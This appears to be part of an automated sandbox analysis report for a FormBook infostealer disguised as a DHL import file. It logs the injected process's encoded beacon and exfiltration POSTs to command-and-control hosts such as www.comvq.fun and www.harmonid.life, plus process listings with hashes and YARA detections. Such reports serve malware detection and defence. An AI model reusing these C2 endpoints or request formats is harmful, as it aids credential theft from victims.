                                                                                        Data Raw: 58 62 44 68 47 56 52 3d 68 67 6d 6d 67 4a 31 32 64 65 68 31 61 48 53 55 70 4b 4d 34 50 71 52 34 44 52 58 6c 6f 68 35 5a 61 71 65 65 37 77 42 2b 6b 64 6f 49 2b 44 4a 71 71 53 43 77 71 43 72 34 4f 47 32 34 46 59 4f 35 32 37 70 51 33 46 6e 78 32 75 45 6d 37 45 43 67 43 58 67 6c 6c 54 66 45 54 63 54 75 42 76 6f 5a 43 52 4e 48 4f 6a 52 70 32 6e 63 35 6b 5a 64 30 31 41 32 71 7a 52 6d 7a 7a 31 39 46 4b 50 72 57 43 57 46 4d 78 53 33 2b 76 65 4d 67 41 61 38 6e 33 7a 54 5a 62 4c 38 33 75 52 2b 56 4a 65 47 44 2f 50 65 41 41 36 49 53 2f 42 70 61 5a 30 38 64 31 50 33 55 42 42 38 65 72 66 55 54 4b 73 57 6c 66 71 48 42 65 4a 30 39 41 4e 74 6f 4a 73 74 45 39 6d 4c 6d 49 49 6f 6a 58 43 62 74 31 78 37 33 52 6f 2b 6d 4d 36 73 5a 66 65 4c 44 59 73 2f 74 62 2f 63 53 57 32 37 44 58 49 57 74 75 34 36 4c 53 6d 53 64 50 36 67 4d 72 2b 4a 5a 5a 57 43 64 71 36 66 75 43 6c 6d 42 67 74 6f 61 6c 6b 48 30 58 6a 4f 7a 42 4b 4b 77 51 2f 54 4f 54 57 43 34 70 69 49 47 4c 31 65 7a 6d 74 4f 65 72 6c 66 58 73 4b 49 48 59 31 32 65 47 33 [TRUNCATED]
                                                                                        Data Ascii: XbDhGVR=[TRUNCATED]


Session ID: 24 | Source IP: 192.168.2.4 | Source Port: 50027 | Destination IP: 103.191.208.137 | Destination Port: 80 | PID: 4340 | Process: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
Timestamp: Nov 1, 2024 19:45:28.017379045 CET | Bytes transferred: 454 | Direction: OUT | Data:
                                                                                        GET /3m9t/?XbDhGVR=siOGj5B0XutXYSucsd0fIKR0LQH5vUluc52n7Rs3scAygCFhnhDrxADoQHiHBruo5ppO8xHCx+tj/iffFnkB/SDXcvjAJfIbSWg6DSwwu1sipuRv+U7XkBw=&Qz=BJvp0BdhxXiTCTGP HTTP/1.1
                                                                                        Host: www.roopiedutech.online
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-us
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
Timestamp: Nov 1, 2024 19:45:30.021539927 CET | Bytes transferred: 523 | Direction: IN | Data:
                                                                                        HTTP/1.1 301 Moved Permanently
                                                                                        Connection: close
                                                                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                        cache-control: no-cache, must-revalidate, max-age=0
                                                                                        content-type: text/html; charset=UTF-8
                                                                                        x-redirect-by: WordPress
                                                                                        location: http://roopiedutech.online/3m9t/?XbDhGVR=siOGj5B0XutXYSucsd0fIKR0LQH5vUluc52n7Rs3scAygCFhnhDrxADoQHiHBruo5ppO8xHCx+tj/iffFnkB/SDXcvjAJfIbSWg6DSwwu1sipuRv+U7XkBw=&Qz=BJvp0BdhxXiTCTGP
                                                                                        x-litespeed-cache: miss
                                                                                        content-length: 0
                                                                                        date: Fri, 01 Nov 2024 18:45:29 GMT
                                                                                        server: LiteSpeed
                                                                                        vary: User-Agent


Session ID: 25 | Source IP: 192.168.2.4 | Source Port: 50028 | Destination IP: 3.111.160.216 | Destination Port: 80 | PID: 4340 | Process: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
Timestamp: Nov 1, 2024 19:45:35.319185019 CET | Bytes transferred: 698 | Direction: OUT | Data:
                                                                                        POST /aajw/ HTTP/1.1
                                                                                        Host: www.comvq.fun
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 204
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.comvq.fun
                                                                                        Referer: http://www.comvq.fun/aajw/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Raw: 58 62 44 68 47 56 52 3d 6f 4c 57 4b 53 4a 6e 51 54 52 46 30 55 4a 63 6c 63 78 7a 62 47 71 33 46 56 5a 43 42 71 67 6e 53 6e 77 4a 47 63 56 50 57 4e 36 53 4d 5a 4e 4a 49 47 41 47 4b 73 79 65 78 42 4f 44 69 62 32 5a 76 57 4e 54 33 45 41 6b 6e 61 58 53 30 51 6d 70 58 44 64 33 55 51 38 70 5a 61 4a 44 47 54 53 46 66 51 30 61 37 42 6c 54 41 63 6e 5a 41 51 45 62 33 79 71 41 51 4b 50 43 36 71 67 41 43 67 6c 4c 32 78 6b 6e 58 4e 4a 55 71 31 6b 45 45 2b 52 49 6f 78 2f 6f 39 35 44 59 57 41 50 68 54 46 75 70 59 47 79 43 77 5a 6f 55 68 58 48 7a 34 6d 37 64 78 4d 75 49 66 52 53 61 75 51 68 47 47 6c 46 69 76 70 67 3d 3d
                                                                                        Data Ascii: XbDhGVR=oLWKSJnQTRF0UJclcxzbGq3FVZCBqgnSnwJGcVPWN6SMZNJIGAGKsyexBODib2ZvWNT3EAknaXS0QmpXDd3UQ8pZaJDGTSFfQ0a7BlTAcnZAQEb3yqAQKPC6qgACglL2xknXNJUq1kEE+RIox/o95DYWAPhTFupYGyCwZoUhXHz4m7dxMuIfRSauQhGGlFivpg==
Timestamp: Nov 1, 2024 19:45:36.381829023 CET | Bytes transferred: 335 | Direction: IN | Data:
                                                                                        HTTP/1.1 404
                                                                                        Server: nginx/1.24.0
                                                                                        Date: Fri, 01 Nov 2024 18:45:36 GMT
                                                                                        Content-Type: application/json;charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Origin
                                                                                        Vary: Access-Control-Request-Method
                                                                                        Vary: Access-Control-Request-Headers
                                                                                        Data Raw: 34 32 0d 0a 7b 22 63 6f 64 65 22 3a 22 34 30 31 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 50 61 72 61 6d 65 74 65 72 20 74 6f 6b 65 6e 20 69 73 20 6e 75 6c 6c 22 2c 22 73 75 63 63 65 73 73 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 42{"code":"401","message":"Parameter token is null","success":false}0


Session ID: 26 | Source IP: 192.168.2.4 | Source Port: 50029 | Destination IP: 3.111.160.216 | Destination Port: 80 | PID: 4340 | Process: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
Timestamp: Nov 1, 2024 19:45:37.862956047 CET | Bytes transferred: 718 | Direction: OUT | Data:
                                                                                        POST /aajw/ HTTP/1.1
                                                                                        Host: www.comvq.fun
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 224
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.comvq.fun
                                                                                        Referer: http://www.comvq.fun/aajw/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Raw: 58 62 44 68 47 56 52 3d 6f 4c 57 4b 53 4a 6e 51 54 52 46 30 55 70 73 6c 52 79 62 62 52 36 33 47 57 5a 43 42 7a 77 6d 56 6e 77 4e 47 63 55 4b 64 4e 49 47 4d 61 74 5a 49 48 42 47 4b 35 79 65 78 50 75 44 37 44 57 59 43 57 4b 62 4a 45 43 67 6e 61 58 57 30 51 6e 5a 58 44 71 4c 62 52 73 70 62 53 70 44 45 65 79 46 66 51 30 61 37 42 6c 33 71 63 6e 52 41 51 56 4c 33 77 50 67 54 4a 50 43 37 39 51 41 43 74 46 4c 79 78 6b 6e 35 4e 49 49 4d 31 6d 4d 45 2b 55 6b 6f 32 75 6f 38 7a 44 59 51 45 50 68 42 42 39 45 7a 47 54 2f 73 61 71 30 7a 56 33 75 59 6e 39 51 72 64 66 70 49 44 53 2b 64 4e 6d 50 79 6f 47 66 6d 79 68 79 39 36 49 53 49 76 65 34 39 37 33 6d 79 43 4e 4d 55 64 46 6f 3d
                                                                                        Data Ascii: XbDhGVR=oLWKSJnQTRF0UpslRybbR63GWZCBzwmVnwNGcUKdNIGMatZIHBGK5yexPuD7DWYCWKbJECgnaXW0QnZXDqLbRspbSpDEeyFfQ0a7Bl3qcnRAQVL3wPgTJPC79QACtFLyxkn5NIIM1mME+Uko2uo8zDYQEPhBB9EzGT/saq0zV3uYn9QrdfpIDS+dNmPyoGfmyhy96ISIve4973myCNMUdFo=
Timestamp: Nov 1, 2024 19:45:38.926793098 CET | Bytes transferred: 335 | Direction: IN | Data:
                                                                                        HTTP/1.1 404
                                                                                        Server: nginx/1.24.0
                                                                                        Date: Fri, 01 Nov 2024 18:45:38 GMT
                                                                                        Content-Type: application/json;charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Origin
                                                                                        Vary: Access-Control-Request-Method
                                                                                        Vary: Access-Control-Request-Headers
                                                                                        Data Raw: 34 32 0d 0a 7b 22 63 6f 64 65 22 3a 22 34 30 31 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 50 61 72 61 6d 65 74 65 72 20 74 6f 6b 65 6e 20 69 73 20 6e 75 6c 6c 22 2c 22 73 75 63 63 65 73 73 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 42{"code":"401","message":"Parameter token is null","success":false}0


Session ID: 27 | Source IP: 192.168.2.4 | Source Port: 50030 | Destination IP: 3.111.160.216 | Destination Port: 80 | PID: 4340 | Process: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
Timestamp: Nov 1, 2024 19:45:40.415122986 CET | Bytes transferred: 10800 | Direction: OUT | Data:
                                                                                        POST /aajw/ HTTP/1.1
                                                                                        Host: www.comvq.fun
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 10304
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.comvq.fun
                                                                                        Referer: http://www.comvq.fun/aajw/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Raw: 58 62 44 68 47 56 52 3d 6f 4c 57 4b 53 4a 6e 51 54 52 46 30 55 70 73 6c 52 79 62 62 52 36 33 47 57 5a 43 42 7a 77 6d 56 6e 77 4e 47 63 55 4b 64 4e 49 65 4d 61 65 68 49 48 69 2b 4b 2f 43 65 78 51 65 44 6d 44 57 59 36 57 4c 2f 56 45 43 74 51 61 56 2b 30 53 46 52 58 49 37 4c 62 62 73 70 62 65 4a 44 42 54 53 46 4f 51 30 4b 2f 42 6c 6e 71 63 6e 52 41 51 57 44 33 30 61 41 54 47 76 43 36 71 67 41 30 67 6c 4c 61 78 6b 75 45 4e 49 4d 36 32 53 41 45 2b 30 30 6f 30 63 41 38 2f 44 59 53 4a 76 67 53 42 39 49 73 47 53 54 67 61 75 38 64 56 31 79 59 6d 72 6b 31 4a 2b 67 55 63 68 71 70 5a 31 37 55 6a 6e 6a 46 38 79 47 55 37 6f 71 45 34 36 6f 58 32 6e 72 5a 66 50 73 73 42 44 72 73 70 44 59 4c 4e 69 4d 47 76 4e 69 6b 37 37 77 6f 4c 64 55 6d 53 6d 62 46 6b 66 37 55 35 31 34 6c 34 35 79 6b 74 6a 57 65 4e 73 78 77 52 46 2b 66 45 71 42 68 32 79 58 70 4a 33 6f 50 4f 43 78 49 66 59 4f 72 32 56 45 76 64 5a 37 32 4a 32 6f 47 69 31 4f 4c 49 46 2f 75 63 41 77 50 77 65 43 41 4c 58 37 6a 53 48 36 43 63 58 48 59 5a 6e 61 7a 45 46 [TRUNCATED]
                                                                                        Data Ascii: XbDhGVR=[TRUNCATED]
Timestamp: Nov 1, 2024 19:45:41.508430958 CET | Bytes transferred: 335 | Direction: IN | Data:
                                                                                        HTTP/1.1 404
                                                                                        Server: nginx/1.24.0
                                                                                        Date: Fri, 01 Nov 2024 18:45:41 GMT
                                                                                        Content-Type: application/json;charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Origin
                                                                                        Vary: Access-Control-Request-Method
                                                                                        Vary: Access-Control-Request-Headers
                                                                                        Data Raw: 34 32 0d 0a 7b 22 63 6f 64 65 22 3a 22 34 30 31 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 50 61 72 61 6d 65 74 65 72 20 74 6f 6b 65 6e 20 69 73 20 6e 75 6c 6c 22 2c 22 73 75 63 63 65 73 73 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 42{"code":"401","message":"Parameter token is null","success":false}0


                                                                                        Session ID:28
                                                                                        Source IP:192.168.2.4
                                                                                        Source Port:50031
                                                                                        Destination IP:3.111.160.216
                                                                                        Destination Port:80
                                                                                        PID:4340
                                                                                        Process:C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        Timestamp:Nov 1, 2024 19:45:42.955718040 CET
                                                                                        Bytes transferred:444
                                                                                        Direction:OUT
                                                                                        Data:GET /aajw/?Qz=BJvp0BdhxXiTCTGP&XbDhGVR=lJ+qR9qEWHtEYfdYXX38H63zdICQzTmBsURfekuXE7iDW/5kFwCD5SzXO8//IXYeWe3pPDw5e3u+RAlULoDse9ZEd7r2QSdjEk66OCO0EG57H2Th8v5BKcw= HTTP/1.1
                                                                                        Host: www.comvq.fun
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-us
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Timestamp:Nov 1, 2024 19:45:44.023185015 CET
                                                                                        Bytes transferred:335
                                                                                        Direction:IN
                                                                                        Data:HTTP/1.1 404
                                                                                        Server: nginx/1.24.0
                                                                                        Date: Fri, 01 Nov 2024 18:45:43 GMT
                                                                                        Content-Type: application/json;charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Origin
                                                                                        Vary: Access-Control-Request-Method
                                                                                        Vary: Access-Control-Request-Headers
                                                                                        Data Raw: 34 32 0d 0a 7b 22 63 6f 64 65 22 3a 22 34 30 31 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 50 61 72 61 6d 65 74 65 72 20 74 6f 6b 65 6e 20 69 73 20 6e 75 6c 6c 22 2c 22 73 75 63 63 65 73 73 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 42{"code":"401","message":"Parameter token is null","success":false}0


                                                                                        Session ID:29
                                                                                        Source IP:192.168.2.4
                                                                                        Source Port:50032
                                                                                        Destination IP:203.161.49.193
                                                                                        Destination Port:80
                                                                                        PID:4340
                                                                                        Process:C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        Timestamp:Nov 1, 2024 19:45:49.304497004 CET
                                                                                        Bytes transferred:710
                                                                                        Direction:OUT
                                                                                        Data:POST /aq3t/ HTTP/1.1
                                                                                        Host: www.harmonid.life
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 204
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.harmonid.life
                                                                                        Referer: http://www.harmonid.life/aq3t/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Raw: 58 62 44 68 47 56 52 3d 34 4d 58 66 4d 37 79 4e 75 43 73 67 33 49 4b 45 6f 78 64 44 4b 6e 57 4a 43 2b 55 42 37 74 53 2b 45 64 7a 6b 74 2f 79 59 48 4d 63 57 70 52 4b 5a 34 57 76 46 47 48 61 6a 37 76 31 7a 30 79 6c 78 45 67 4d 5a 53 6d 72 50 6f 53 72 66 54 51 6d 4a 58 6b 46 2f 2f 6e 70 73 76 75 6f 32 69 53 70 36 54 47 66 77 54 41 46 33 4e 34 63 35 79 68 47 72 76 6a 79 57 68 34 7a 35 62 34 56 73 67 73 4b 54 61 74 39 6c 53 31 33 4a 49 4f 6b 72 69 69 55 61 6f 74 50 6a 71 44 46 4a 71 7a 4a 67 4d 73 4d 43 4f 6c 61 59 6e 4b 32 52 34 6a 44 33 7a 78 35 44 38 71 70 2f 38 73 4c 63 50 44 74 59 34 49 6a 2b 34 67 3d 3d
                                                                                        Data Ascii: XbDhGVR=4MXfM7yNuCsg3IKEoxdDKnWJC+UB7tS+Edzkt/yYHMcWpRKZ4WvFGHaj7v1z0ylxEgMZSmrPoSrfTQmJXkF//npsvuo2iSp6TGfwTAF3N4c5yhGrvjyWh4z5b4VsgsKTat9lS13JIOkriiUaotPjqDFJqzJgMsMCOlaYnK2R4jD3zx5D8qp/8sLcPDtY4Ij+4g==
                                                                                        Timestamp:Nov 1, 2024 19:45:50.008357048 CET
                                                                                        Bytes transferred:533
                                                                                        Direction:IN
                                                                                        Data:HTTP/1.1 404 Not Found
                                                                                        Date: Fri, 01 Nov 2024 18:45:49 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 389
                                                                                        Connection: close
                                                                                        Content-Type: text/html
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                        Session ID:30
                                                                                        Source IP:192.168.2.4
                                                                                        Source Port:50033
                                                                                        Destination IP:203.161.49.193
                                                                                        Destination Port:80
                                                                                        Timestamp:Nov 1, 2024 19:45:52.207448006 CET
                                                                                        Bytes transferred:730
                                                                                        Direction:OUT
                                                                                        Data:POST /aq3t/ HTTP/1.1
                                                                                        Host: www.harmonid.life
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 224
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.harmonid.life
                                                                                        Referer: http://www.harmonid.life/aq3t/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Raw: 58 62 44 68 47 56 52 3d 34 4d 58 66 4d 37 79 4e 75 43 73 67 32 72 69 45 74 57 4a 44 4d 48 57 4b 47 4f 55 42 78 4e 53 36 45 64 50 6b 74 39 65 79 48 2b 34 57 6f 77 61 5a 35 54 44 46 48 48 61 6a 7a 50 31 79 72 43 6c 36 45 67 51 76 53 69 6a 50 6f 53 76 66 54 52 32 4a 58 56 46 38 74 48 70 71 6d 4f 6f 77 74 79 70 36 54 47 66 77 54 41 67 53 4e 34 30 35 7a 53 4f 72 74 43 79 56 2f 6f 7a 2b 63 34 56 73 7a 38 4b 58 61 74 38 41 53 33 54 6a 49 49 67 72 69 6d 51 61 70 2f 6e 67 7a 54 46 50 70 44 49 73 64 76 70 46 45 33 66 51 67 4c 48 77 36 67 2b 62 37 58 30 5a 74 62 49 6f 75 73 76 76 53 45 6b 73 31 4c 65 33 6a 6a 63 4b 49 49 45 33 35 56 30 4c 57 66 64 6f 42 39 49 63 7a 6e 30 3d
                                                                                        Data Ascii: XbDhGVR=4MXfM7yNuCsg2riEtWJDMHWKGOUBxNS6EdPkt9eyH+4WowaZ5TDFHHajzP1yrCl6EgQvSijPoSvfTR2JXVF8tHpqmOowtyp6TGfwTAgSN405zSOrtCyV/oz+c4Vsz8KXat8AS3TjIIgrimQap/ngzTFPpDIsdvpFE3fQgLHw6g+b7X0ZtbIousvvSEks1Le3jjcKIIE35V0LWfdoB9Iczn0=
                                                                                        Timestamp:Nov 1, 2024 19:45:52.906157970 CET
                                                                                        Bytes transferred:533
                                                                                        Direction:IN
                                                                                        Data:HTTP/1.1 404 Not Found
                                                                                        Date: Fri, 01 Nov 2024 18:45:52 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 389
                                                                                        Connection: close
                                                                                        Content-Type: text/html
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>



                                                                                        Target ID:0
                                                                                        Start time:14:42:45
                                                                                        Start date:01/11/2024
                                                                                        Path:C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe"
                                                                                        Imagebase:0x7d0000
                                                                                        File size:1'632'256 bytes
                                                                                        MD5 hash:2F01C94DF712E58B8227588BA7A376C6
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:2
                                                                                        Start time:14:43:02
                                                                                        Start date:01/11/2024
                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe"
                                                                                        Imagebase:0x340000
                                                                                        File size:46'504 bytes
                                                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2108161360.0000000003820000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2108497197.0000000005400000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2107863042.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:5
                                                                                        Start time:14:43:20
                                                                                        Start date:01/11/2024
                                                                                        Path:C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe"
                                                                                        Imagebase:0x730000
                                                                                        File size:140'800 bytes
                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3518477270.0000000003CC0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:6
                                                                                        Start time:14:43:22
                                                                                        Start date:01/11/2024
                                                                                        Path:C:\Windows\SysWOW64\wusa.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\SysWOW64\wusa.exe"
                                                                                        Imagebase:0x7ff70f330000
                                                                                        File size:325'120 bytes
                                                                                        MD5 hash:EB96F0F207F203DD0B6D8A2625270495
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:7
                                                                                        Start time:14:43:22
                                                                                        Start date:01/11/2024
                                                                                        Path:C:\Windows\SysWOW64\net.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\SysWOW64\net.exe"
                                                                                        Imagebase:0x9e0000
                                                                                        File size:47'104 bytes
